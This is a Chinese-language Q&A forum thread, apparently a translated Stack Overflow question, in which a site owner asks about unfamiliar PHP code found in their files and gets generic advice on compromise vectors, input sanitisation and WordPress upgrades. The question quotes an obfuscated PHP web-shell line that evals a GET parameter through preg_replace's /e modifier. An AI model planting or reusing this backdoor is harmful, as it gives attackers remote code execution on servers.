我有一个常规托管计划的系统,该公司没有钱获得云计划,所以我已经用它来启动,他们现在正计划改为专用服务。
它的一个php + mysql简单系统可以跟踪一些用户并生成邮件列表和其他一些东西。
问题在于,在某些文件中我看到了一个我没有输入的代码......我无法理解代码是什么,所以我在这里告诉你:
$khg= '_'."GE".'T';if (!empty(${$khg}['15'])) preg_replace('~.*~e', "e".'V'.'al($'.$khg.'["15"])','');
有人知道这是关于什么的吗?
ps:主机也有一个wordpress(公司主网站)。研究我已经看到这可能是一些使用wordpress失败的php注入(在一些wordpress文件上我也见过代码)。但我还没找到太多信息......
提前谢谢大家!
答案 0 :(得分:3)
您的网站可能有多种方式遭到入侵:
没有更多信息,没有办法确切知道如何,但这些是非常常见的折衷向量。
你说你有一个“简单的PHP + MySQL系统”来执行任务。查看处理输入的PHP代码中的所有位置。你在消毒它们吗? (您可以通过Google搜索来了解有关此内容的更多信息。)即使一个未经过抽样的输入代表了一个坏人的潜在后门。
清理完代码后,升级Wordpress等,记得要做与密码相关的剩余清理工作: